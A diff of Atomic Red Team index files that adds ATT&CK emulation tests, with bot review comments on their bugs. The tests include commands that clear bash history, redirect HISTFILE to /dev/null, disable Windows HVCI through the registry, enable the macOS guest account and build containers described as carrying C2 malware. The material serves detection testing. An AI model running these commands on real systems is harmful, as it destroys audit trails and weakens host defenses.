| | Service Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hypervisor [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Impair Defenses](../../T1562/T1562.md) | Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | Uncommonly Used Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | PowerShell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Thread Execution Hijacking](../../T1055.003/T1055.003.md) | Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Time Discovery](../../T1124/T1124.md) | | | | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
|
||||
@@ -7862,6 +7862,7 @@ defense-evasion:
|
||||
x_mitre_permissions_required:
|
||||
- User
|
||||
- root
|
||||
identifier: T1612
|
||||
atomic_tests: []
|
||||
T1055.002:
|
||||
technique:
|
||||
@@ -53461,7 +53462,7 @@ discovery:
|
||||
macOS APT Activity Bradley)"
|
||||
modified: '2022-04-20T16:05:30.960Z'
|
||||
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||||
name: Network Service Scanning
|
||||
name: Network Service Discovery
|
||||
x_mitre_detection: |-
|
||||
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
|
||||
|
||||
|
||||
@@ -7800,7 +7800,45 @@ defense-evasion:
|
||||
x_mitre_permissions_required:
|
||||
- User
|
||||
- root
|
||||
atomic_tests: []
|
||||
identifier: T1612
|
||||
atomic_tests:
|
||||
- name: Build Image On Host
|
||||
auto_generated_guid: 2db30061-589d-409b-b125-7b473944f9b3
|
||||
description: Adversaries may build a container image directly on a host to bypass
|
||||
defenses that monitor for the retrieval of malicious images from a public
|
||||
registry. An adversary may take advantage of that build API to build a custom
|
||||
image on the host that includes malware downloaded from their C2 server, and
|
||||
then they then may utilize Deploy Container using that custom image.
|
||||
supported_platforms:
|
||||
- containers
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: Verify docker is installed.
|
||||
prereq_command: 'which docker
|
||||
|
||||
'
|
||||
get_prereq_command: 'if [ "" == "`which docker`" ]; then echo "Docker Not
|
||||
Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker
|
||||
; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else
|
||||
echo "Docker installed"; fi
|
||||
|
||||
'
|
||||
- description: Verify docker service is running.
|
||||
prereq_command: 'sudo systemctl status docker --no-pager
|
||||
|
||||
'
|
||||
get_prereq_command: 'sudo systemctl start docker
|
||||
|
||||
'
|
||||
executor:
|
||||
command: |-
|
||||
docker build -t t1612 $PathtoAtomicsFolder/T1612/src/
|
||||
docker run --name t1612_container -d -t t1612
|
||||
docker exec t1612_container ./test.sh
|
||||
cleanup_command: |-
|
||||
docker stop t1612_container
|
||||
docker rmi -f t1612
|
||||
name: sh
|
||||
T1055.002:
|
||||
technique:
|
||||
x_mitre_platforms:
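Review bot: The cleanup of `Build Image On Host` stops `t1612_container` but never removes it, so `docker rmi -f t1612` only untags an image that the stopped container still references, and a second run of the test fails at `docker run --name t1612_container` with a name conflict; add `docker rm -f t1612_container` before the `rmi`. The dependency check `if [ "" == "`which docker`" ]` runs under `dependency_executor_name: sh`, and POSIX `test` only defines `=`; on dash the `==` is rejected as an unexpected operator (non-zero status), which sends the script to the `else` branch and prints "Docker installed" without installing anything — `if [ -z "$(command -v docker)" ]` is the portable form. Hedged, as it depends on the distribution: the package name `docker` passed to `apt-get` has historically not been Docker Engine on Debian/Ubuntu (that is `docker.io` or `docker-ce`), so the auto-install path is worth confirming before relying on it.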
|
||||
@@ -26814,6 +26852,10 @@ execution:
|
||||
description: Command to run
|
||||
type: string
|
||||
default: uname
|
||||
path:
|
||||
description: Path to busybox.yaml file
|
||||
type: string
|
||||
default: "$PathtoAtomicsFolder/T1609/src/busybox.yaml"
|
||||
dependencies:
|
||||
- description: 'kubectl must be installed
|
||||
|
||||
@@ -26826,7 +26868,9 @@ execution:
|
||||
'
|
||||
executor:
|
||||
command: |
|
||||
kubectl create -f src/busybox.yaml -n #{namespace}
|
||||
kubectl create -f #{path} -n #{namespace}
|
||||
# wait 3 seconds for the instance to come up
|
||||
sleep 3
|
||||
kubectl exec -n #{namespace} busybox -- #{command}
|
||||
cleanup_command: 'kubectl delete pod busybox -n #{namespace}
|
||||
|
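Review bot: The pod name `busybox` stays hard-coded in `kubectl exec -n #{namespace} busybox -- #{command}` and in the cleanup `kubectl delete pod busybox` even though the manifest is now taken from the `#{path}` input, so a caller who points `path` at a manifest that creates a differently named pod gets a pod that is never exec'd into and never deleted. Either document in the `path` argument description that the manifest must create a pod named `busybox`, or add a `pod_name` input used by both lines. Separately, `sleep 3` is a race rather than a readiness check; replacing the comment and the sleep with `kubectl wait --for=condition=Ready pod/busybox -n #{namespace} --timeout=60s` makes the exec deterministic and fails loudly when the pod never starts. The input-argument block that defines `path` is in the previous hunk.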
||||
@@ -52536,7 +52580,44 @@ discovery:
|
||||
x_mitre_permissions_required:
|
||||
- User
|
||||
identifier: T1069.001
|
||||
atomic_tests: []
|
||||
atomic_tests:
|
||||
- name: Permission Groups Discovery for Containers- Local Groups
|
||||
auto_generated_guid: 007d7aa4-8c4d-4f55-ba6a-7c965d51219c
|
||||
description: Attackers may try to obtain a list of services that are operating
|
||||
on remote hosts and local network infrastructure devices, in order to identify
|
||||
potential vulnerabilities that can be exploited through remote software attacks.
|
||||
They typically use tools to conduct port and vulnerability scans in order
|
||||
to obtain this information.
|
||||
supported_platforms:
|
||||
- containers
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: Verify docker is installed.
|
||||
prereq_command: 'which docker
|
||||
|
||||
'
|
||||
get_prereq_command: 'if [ "" == "`which docker`" ]; then echo "Docker Not
|
||||
Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker
|
||||
; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else
|
||||
echo "Docker installed"; fi
|
||||
|
||||
'
|
||||
- description: Verify docker service is running.
|
||||
prereq_command: 'sudo systemctl status docker --no-pager
|
||||
|
||||
'
|
||||
get_prereq_command: 'sudo systemctl start docker
|
||||
|
||||
'
|
||||
executor:
|
||||
command: |-
|
||||
docker build -t t1069 $PathtoAtomicsFolder/T1069.001/src/
|
||||
docker run --name t1069_container -d -t t1069
|
||||
docker exec t1069_container ./test.sh
|
||||
cleanup_command: |-
|
||||
docker stop t1069_container
|
||||
docker rmi -f t1069
|
||||
name: sh
|
||||
T1201:
|
||||
technique:
|
||||
x_mitre_platforms:
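Review bot: The description of `Permission Groups Discovery for Containers- Local Groups` is the Network Service Discovery text (port and vulnerability scans of remote hosts) and says nothing about local group discovery; it appears to be copied from the T1046 entry added in the same commit. Since `src/test.sh` is not visible here, the replacement should state what that script actually does, along the lines of `description: Enumerates local groups and group membership from inside a container (see src/test.sh).` The cleanup also stops but never removes `t1069_container`, so `docker rmi -f t1069` leaves the image referenced by the stopped container and a re-run fails on the `--name` conflict; add `docker rm -f t1069_container` before the `rmi`.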
|
||||
@@ -53086,7 +53167,7 @@ discovery:
|
||||
macOS APT Activity Bradley)"
|
||||
modified: '2022-04-20T16:05:30.960Z'
|
||||
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||||
name: Network Service Scanning
|
||||
name: Network Service Discovery
|
||||
x_mitre_detection: |-
|
||||
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
|
||||
|
||||
@@ -53102,7 +53183,44 @@ discovery:
|
||||
x_mitre_attack_spec_version: 2.1.0
|
||||
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||||
identifier: T1046
|
||||
atomic_tests: []
|
||||
atomic_tests:
|
||||
- name: Network Service Discovery for Containers
|
||||
auto_generated_guid: 06eaafdb-8982-426e-8a31-d572da633caa
|
||||
description: Attackers may try to obtain a list of services that are operating
|
||||
on remote hosts and local network infrastructure devices, in order to identify
|
||||
potential vulnerabilities that can be exploited through remote software attacks.
|
||||
They typically use tools to conduct port and vulnerability scans in order
|
||||
to obtain this information.
|
||||
supported_platforms:
|
||||
- containers
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: Verify docker is installed.
|
||||
prereq_command: 'which docker
|
||||
|
||||
'
|
||||
get_prereq_command: 'if [ "" == "`which docker`" ]; then echo "Docker Not
|
||||
Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker
|
||||
; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else
|
||||
echo "Docker installed"; fi
|
||||
|
||||
'
|
||||
- description: Verify docker service is running.
|
||||
prereq_command: 'sudo systemctl status docker --no-pager
|
||||
|
||||
'
|
||||
get_prereq_command: 'sudo systemctl start docker
|
||||
|
||||
'
|
||||
executor:
|
||||
command: |-
|
||||
docker build -t t1046 /root/AtomicRedTeam/atomics/T1046/src/
|
||||
docker run --name t1046_container -d -t t1046
|
||||
docker exec t1046_container ./test.sh
|
||||
cleanup_command: |-
|
||||
docker stop t1046_container
|
||||
docker rmi -f t1046
|
||||
name: sh
|
||||
T1518:
|
||||
technique:
|
||||
x_mitre_platforms:
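Review bot: `docker build -t t1046 /root/AtomicRedTeam/atomics/T1046/src/` hard-codes the root user's default install path, while the sibling container tests in this commit build from `$PathtoAtomicsFolder`, so this test fails for any non-root runner or non-default checkout; change it to `docker build -t t1046 $PathtoAtomicsFolder/T1046/src/`. The cleanup stops but never removes `t1046_container`, so `docker rmi -f t1046` leaves the image referenced by the stopped container and a second run fails on the `--name` conflict; add `docker rm -f t1046_container` before the `rmi`. The description is the generic technique text and does not say what `src/test.sh` scans or from where, which a detection engineer validating this test will want stated — presumably it scans from inside the container, but that is not visible here.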
|
||||
|
||||
@@ -7766,6 +7766,7 @@ defense-evasion:
|
||||
x_mitre_permissions_required:
|
||||
- User
|
||||
- root
|
||||
identifier: T1612
|
||||
atomic_tests: []
|
||||
T1055.002:
|
||||
technique:
|
||||
@@ -52637,7 +52638,7 @@ discovery:
|
||||
macOS APT Activity Bradley)"
|
||||
modified: '2022-04-20T16:05:30.960Z'
|
||||
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||||
name: Network Service Scanning
|
||||
name: Network Service Discovery
|
||||
x_mitre_detection: |-
|
||||
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
|
||||
|
||||
|
||||
@@ -7766,6 +7766,7 @@ defense-evasion:
|
||||
x_mitre_permissions_required:
|
||||
- User
|
||||
- root
|
||||
identifier: T1612
|
||||
atomic_tests: []
|
||||
T1055.002:
|
||||
technique:
|
||||
@@ -52481,7 +52482,7 @@ discovery:
|
||||
macOS APT Activity Bradley)"
|
||||
modified: '2022-04-20T16:05:30.960Z'
|
||||
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||||
name: Network Service Scanning
|
||||
name: Network Service Discovery
|
||||
x_mitre_detection: |-
|
||||
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
|
||||
|
||||
|
||||
@@ -7766,6 +7766,7 @@ defense-evasion:
|
||||
x_mitre_permissions_required:
|
||||
- User
|
||||
- root
|
||||
identifier: T1612
|
||||
atomic_tests: []
|
||||
T1055.002:
|
||||
technique:
|
||||
@@ -52818,7 +52819,7 @@ discovery:
|
||||
macOS APT Activity Bradley)"
|
||||
modified: '2022-04-20T16:05:30.960Z'
|
||||
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||||
name: Network Service Scanning
|
||||
name: Network Service Discovery
|
||||
x_mitre_detection: |-
|
||||
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
|
||||
|
||||
|
||||
@@ -7766,6 +7766,7 @@ defense-evasion:
|
||||
x_mitre_permissions_required:
|
||||
- User
|
||||
- root
|
||||
identifier: T1612
|
||||
atomic_tests: []
|
||||
T1055.002:
|
||||
technique:
|
||||
@@ -53136,7 +53137,7 @@ discovery:
|
||||
macOS APT Activity Bradley)"
|
||||
modified: '2022-04-20T16:05:30.960Z'
|
||||
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||||
name: Network Service Scanning
|
||||
name: Network Service Discovery
|
||||
x_mitre_detection: |-
|
||||
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
|
||||
|
||||
|
||||
@@ -7766,6 +7766,7 @@ defense-evasion:
|
||||
x_mitre_permissions_required:
|
||||
- User
|
||||
- root
|
||||
identifier: T1612
|
||||
atomic_tests: []
|
||||
T1055.002:
|
||||
technique:
|
||||
@@ -52637,7 +52638,7 @@ discovery:
|
||||
macOS APT Activity Bradley)"
|
||||
modified: '2022-04-20T16:05:30.960Z'
|
||||
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||||
name: Network Service Scanning
|
||||
name: Network Service Discovery
|
||||
x_mitre_detection: |-
|
||||
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
|
||||
|
||||
|
||||
+339
-3
@@ -12084,6 +12084,17 @@ defense-evasion:
|
||||
'
|
||||
name: command_prompt
|
||||
elevation_required: true
|
||||
- name: Enable Guest Account on macOS
|
||||
auto_generated_guid: 0315bdff-4178-47e9-81e4-f31a6d23f7e4
|
||||
description: This test enables the guest account on macOS using sysadminctl
|
||||
utility.
|
||||
supported_platforms:
|
||||
- macos
|
||||
executor:
|
||||
command: sudo sysadminctl -guestAccount on
|
||||
cleanup_command: sudo sysadminctl -guestAccount off
|
||||
name: command_prompt
|
||||
elevation_required: true
|
||||
T1183:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
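Review bot: The new 'Enable Guest Account on macOS' test declares `supported_platforms: - macos` but its executor is `name: command_prompt`, which is the Windows cmd.exe executor; on macOS the test needs `name: sh` (or `bash`) or it will never be run by the harness. The cleanup `sudo sysadminctl -guestAccount off` also turns the guest account off regardless of its prior state, so on a host where it was already enabled the cleanup changes the baseline rather than restoring it; a prereq that records the prior state, or a description line saying the cleanup leaves the account disabled, would make that explicit. The same block is added verbatim in the privilege-escalation (@@ -33683), persistence (@@ -56329) and initial-access (@@ -104873) hunks and in the later index copies (@@ -6531, @@ -20608, @@ -35793, @@ -67632), so the executor name should be fixed in the source atomic so every generated index picks it up.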
@@ -15268,7 +15279,45 @@ defense-evasion:
|
||||
x_mitre_permissions_required:
|
||||
- User
|
||||
- root
|
||||
atomic_tests: []
|
||||
identifier: T1612
|
||||
atomic_tests:
|
||||
- name: Build Image On Host
|
||||
auto_generated_guid: 2db30061-589d-409b-b125-7b473944f9b3
|
||||
description: Adversaries may build a container image directly on a host to bypass
|
||||
defenses that monitor for the retrieval of malicious images from a public
|
||||
registry. An adversary may take advantage of that build API to build a custom
|
||||
image on the host that includes malware downloaded from their C2 server, and
|
||||
then they then may utilize Deploy Container using that custom image.
|
||||
supported_platforms:
|
||||
- containers
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: Verify docker is installed.
|
||||
prereq_command: 'which docker
|
||||
|
||||
'
|
||||
get_prereq_command: 'if [ "" == "`which docker`" ]; then echo "Docker Not
|
||||
Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker
|
||||
; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else
|
||||
echo "Docker installed"; fi
|
||||
|
||||
'
|
||||
- description: Verify docker service is running.
|
||||
prereq_command: 'sudo systemctl status docker --no-pager
|
||||
|
||||
'
|
||||
get_prereq_command: 'sudo systemctl start docker
|
||||
|
||||
'
|
||||
executor:
|
||||
command: |-
|
||||
docker build -t t1612 $PathtoAtomicsFolder/T1612/src/
|
||||
docker run --name t1612_container -d -t t1612
|
||||
docker exec t1612_container ./test.sh
|
||||
cleanup_command: |-
|
||||
docker stop t1612_container
|
||||
docker rmi -f t1612
|
||||
name: sh
|
||||
T1055.002:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
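Review bot: The cleanup of 'Build Image On Host' only stops the container (`docker stop t1612_container`) and then force-removes the image; the stopped container named `t1612_container` is left behind, so a second run fails at `docker run --name t1612_container` with a name conflict, and `docker rm -f t1612_container` before `docker rmi -f t1612` fixes that. The prereq uses `[ "" == "`which docker`" ]` under `dependency_executor_name: sh`; `==` is a bash extension that a POSIX sh such as dash rejects, so `[ -z "$(command -v docker)" ]` is the portable form. The package name `docker` passed to apt-get/yum is also worth checking, since on Debian/Ubuntu the engine is packaged as `docker.io` and `apt-get install docker` may not install it. The same cleanup and prereq pattern recurs in the T1069.001 (@@ -90382) and T1046 (@@ -92079) container tests below.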
@@ -16567,6 +16616,115 @@ defense-evasion:
|
||||
3. ls
|
||||
4. whoami > recon.txt
|
||||
name: manual
|
||||
- name: Clear bash history
|
||||
auto_generated_guid: 878794f7-c511-4199-a950-8c28b3ed8e5b
|
||||
description: "An attacker may clear the bash history cache and the history file
|
||||
as their last act before logging off to remove the record of their command
|
||||
line activities. \n\nIn this test we use the $HISTFILE variable throughout
|
||||
to 1. confirms the $HISTFILE variable is set 2. echo \"\" into it 3..5 confirm
|
||||
the file is empty 6 clear the history cache 7. confirm the history cache is
|
||||
empty. This is when the attacker would logoff.\n"
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
name: bash
|
||||
elevation_required: false
|
||||
command: "cp $HISTFILE $HISTFILE.OLD\nif ((${#HISTFILE[@]})); then echo $HISTFILE;
|
||||
fi\necho \"\" > $HISTFILE\nif [ $(wc -c <$HISTFILE) -gt 1 ]; then echo \"$HISTFILE
|
||||
is larger than 1k\"; fi\nls -la $HISTFILE \ncat $HISTFILE\nhistory -c \nif
|
||||
[ $(history |wc -l) -eq 1 ]; then echo \"History cache cleared\"; fi\n"
|
||||
cleanup_command: "mv -f $HISTFILE.OLD $HISTFILE \n"
|
||||
- name: Setting the HISTCONTROL environment variable
|
||||
auto_generated_guid: 10ab786a-028e-4465-96f6-9e83ca6c5f24
|
||||
description: "An attacker may exploit the space before a command (e.g. \" ls\")
|
||||
or the duplicate command suppression feature in Bash history to prevent their
|
||||
commands from being recorded in the history file or to obscure the order of
|
||||
commands used. \n\nIn this test we 1. sets $HISTCONTROL to ignoreboth 2. clears
|
||||
the history cache 3. executes ls -la with a space in-front of it 4. confirms
|
||||
that ls -la is not in the history cache 5. sets $HISTCONTROL to erasedups
|
||||
6. clears the history cache 7..9 executes ls -la $HISTFILE 3 times 10. confirms
|
||||
that their is only one command in history\n"
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
name: bash
|
||||
elevation_required: false
|
||||
command: "TEST=$(echo $HISTCONTROL)\nif [ \"$HISTCONTROL\" != \"ignoreboth\"
|
||||
]; then export HISTCONTROL=\"ignoreboth\"; fi\nhistory -c \nls -la $HISTFILE
|
||||
# \" ls -la $HISTFILE\"\nif [ $(history |wc -l) -eq 1 ]; then echo \"ls
|
||||
-la is not in history cache\"; fi\n# -> ls -la is not in history cache\nif
|
||||
[ \"$HISTCONTROL\" != \"erasedups\" ]; then export HISTCONTROL=\"erasedups\";
|
||||
fi\nhistory -c \nls -la $HISTFILE\nls -la $HISTFILE\nls -la $HISTFILE\nif
|
||||
[ $(history |wc -l) -eq 2 ]; then echo \"Their is only one entry for ls
|
||||
-la $HISTFILE\"; fi\n"
|
||||
cleanup_command: 'export HISTCONTROL=$(echo $TEST)
|
||||
|
||||
'
|
||||
- name: Setting the HISTFILESIZE environment variable
|
||||
auto_generated_guid: 5cafd6c1-2f43-46eb-ac47-a5301ba0a618
|
||||
description: |
|
||||
An Adversary may set the bash history files size environment variable (HISTFILESIZE) to zero to prevent the logging of commands to the history file after they log out of the system.
|
||||
|
||||
Note: we don't wish to log out, so we are just confirming the value of HISTFILESIZE. In this test we 1. echo HISTFILESIZE 2. set it to zero 3. confirm that HISTFILESIZE is set to zero.
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
name: bash
|
||||
elevation_required: false
|
||||
command: |
|
||||
TEST=$(echo $HISTFILESIZE)
|
||||
echo $HISTFILESIZE
|
||||
export HISTFILESIZE=0
|
||||
if [ $(echo $HISTFILESIZE) -eq 0 ]; then echo "\$HISTFILESIZE is zero"; fi
|
||||
# -> $HISTFILESIZE is zero
|
||||
cleanup_command: 'export HISTCONTROL=$(echo $TEST)
|
||||
|
||||
'
|
||||
- name: Setting the HISTFILE environment variable
|
||||
auto_generated_guid: b3dacb6c-a9e3-44ec-bf87-38db60c5cad1
|
||||
description: |
|
||||
An Adversary may clear, unset or redirect the history environment variable HISTFILE to prevent logging of commands to the history file after they log out of the system.
|
||||
|
||||
Note: we don't wish to log out, so we are just confirming the value of HISTFILE. In this test we 1. echo HISTFILE 2. set it to /dev/null 3. confirm that HISTFILE is set to /dev/null.
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
name: bash
|
||||
elevation_required: false
|
||||
command: |
|
||||
TEST=$(echo $HISTFILE)
|
||||
echo $HISTFILE
|
||||
export HISTFILE="/dev/null"
|
||||
if [ $(echo $HISTFILE) == "/dev/null" ]; then echo "\$HISTFILE is /dev/null"; fi
|
||||
# -> $HISTFILE is /dev/null
|
||||
cleanup_command: 'export HISTFILE=$(echo $TEST)
|
||||
|
||||
'
|
||||
- name: Setting the HISTIGNORE environment variable
|
||||
auto_generated_guid: f12acddb-7502-4ce6-a146-5b62c59592f1
|
||||
description: "An Adversary may take advantage of the HISTIGNORE environment
|
||||
variable either to ignore particular commands or all commands. \n\nIn this
|
||||
test we 1. set HISTIGNORE to ignore ls, rm and ssh commands 2. clear this
|
||||
history cache 3..4 execute ls commands 5. confirm that the ls commands are
|
||||
not in the history cache 6. unset HISTIGNORE variable 7.. same again, but
|
||||
ignoring ALL commands.\n"
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
name: bash
|
||||
elevation_required: false
|
||||
command: "if ((${#HISTIGNORE[@]})); then echo \"\\$HISTIGNORE = $HISTIGNORE\";
|
||||
else export HISTIGNORE='ls*:rm*:ssh*'; echo \"\\$HISTIGNORE = $HISTIGNORE\";
|
||||
fi\n# -> $HISTIGNORE = ls*:rm*:ssh*\nhistory -c \nls -la $HISTFILE\nls -la
|
||||
~/.bash_logout\nif [ $(history |wc -l) -eq 1 ]; then echo \"ls commands
|
||||
are not in history\"; fi\n# -> ls commands are not in history\nunset HISTIGNORE\n\nif
|
||||
((${#HISTIGNORE[@]})); then echo \"\\$HISTIGNORE = $HISTIGNORE\"; else export
|
||||
HISTIGNORE='*'; echo \"\\$HISTIGNORE = $HISTIGNORE\"; fi\n# -> $HISTIGNORE
|
||||
= *\nhistory -c \nwhoami\ngroups\nif [ $(history |wc -l) -eq 0 ]; then echo
|
||||
\"History cache is empty\"; fi\n# -> History cache is empty\n"
|
||||
cleanup_command: 'unset HISTIGNORE
|
||||
|
||||
'
|
||||
T1497.002:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
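Review bot: The cleanup of 'Setting the HISTFILESIZE environment variable' restores the wrong variable: `cleanup_command: 'export HISTCONTROL=$(echo $TEST)` should be `export HISTFILESIZE=$(echo $TEST)`, mirroring the HISTFILE test below it, which restores `HISTFILE`. More generally these cleanups rely on `$TEST` surviving from the command step to the cleanup step, which only holds if both run in the same shell session; if the harness spawns a fresh shell per step the cleanup silently exports an empty value, so stating the intended session model in the description, or writing the saved value to a file, would make the restore reliable. The identical block is added again in the second index copy (@@ -10437).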
@@ -18946,6 +19104,52 @@ defense-evasion:
|
||||
sync
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Disable Hypervisor-Enforced Code Integrity (HVCI)
|
||||
auto_generated_guid: 70bd71e6-eba4-4e00-92f7-617911dbe020
|
||||
description: "This test disables Hypervisor-Enforced Code Integrity (HVCI) by
|
||||
setting the registry key HKLM:\\SYSTEM\\CurrentControlSet\\Control\\DeviceGuard\\Scenarios\\HypervisorEnforcedCodeIntegrity
|
||||
\"Enabled\" value to \"0\".\nThe pre-req needs to be ran in order to setup
|
||||
HVCI and have it enabled. \nWe do not recommend running this in production.\n[Black
|
||||
Lotus Campaign](https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/)\n[Microsoft](https://learn.microsoft.com/en-us/windows/security/threat-protection/device-guard/enable-virtualization-based-protection-of-code-integrity)\n"
|
||||
supported_platforms:
|
||||
- windows
|
||||
dependency_executor_name: powershell
|
||||
dependencies:
|
||||
- description: 'HVCI must be enabled
|
||||
|
||||
'
|
||||
prereq_command: 'if (((cmd.exe /c "reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard"
|
||||
/v "EnableVirtualizationBasedSecurity" 2> nul | findstr EnableVirtualizationBasedSecurity
|
||||
2> nul") -and (cmd.exe /c "reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard"
|
||||
/v "RequirePlatformSecurityFeatures" 2> nul | findstr RequirePlatformSecurityFeatures
|
||||
2> nul") -and (cmd.exe /c "reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard"
|
||||
/v "Locked" 2> nul | findstr Locked 2> nul") -and (cmd.exe /c "reg query
|
||||
"HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity"
|
||||
/v "Enabled" 2> nul | findstr Enabled 2> nul") -and (cmd.exe /c "reg query
|
||||
"HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity"
|
||||
/v "Locked" 2> nul | findstr Locked 2> nul"))) { exit 0 } else { exit 1
|
||||
}
|
||||
|
||||
'
|
||||
get_prereq_command: |
|
||||
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "EnableVirtualizationBasedSecurity" /t REG_DWORD /d 1 /f
|
||||
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "RequirePlatformSecurityFeatures" /t REG_DWORD /d 1 /f
|
||||
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "Locked" /t REG_DWORD /d 0 /f
|
||||
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Enabled" /t REG_DWORD /d 1 /f
|
||||
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Locked" /t REG_DWORD /d 0 /f
|
||||
executor:
|
||||
command: 'reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity"
|
||||
/v "Enabled" /t REG_DWORD /d 0 /f
|
||||
|
||||
'
|
||||
cleanup_command: |
|
||||
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "EnableVirtualizationBasedSecurity" /f
|
||||
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "RequirePlatformSecurityFeatures" /f
|
||||
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "Locked" /f
|
||||
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Enabled" /f
|
||||
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Locked" /f
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
T1601:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
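Review bot: The cleanup of 'Disable Hypervisor-Enforced Code Integrity (HVCI)' runs `reg delete` on all five DeviceGuard values, which removes whatever VBS/HVCI configuration the host had before the test rather than restoring it; on a host where those values were already set, the cleanup leaves HVCI unconfigured. Capturing the existing values in the prereq (for example a `reg export` of the DeviceGuard key to a file) and restoring them in cleanup would make the test reversible. The description already warns against production use; it could add that the `Enabled` change is a registry write whose effect on the running HVCI state is presumably only visible after a reboot, so a detection built from this test should key on the registry modification rather than on observed HVCI state.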
@@ -33683,6 +33887,17 @@ privilege-escalation:
|
||||
'
|
||||
name: command_prompt
|
||||
elevation_required: true
|
||||
- name: Enable Guest Account on macOS
|
||||
auto_generated_guid: 0315bdff-4178-47e9-81e4-f31a6d23f7e4
|
||||
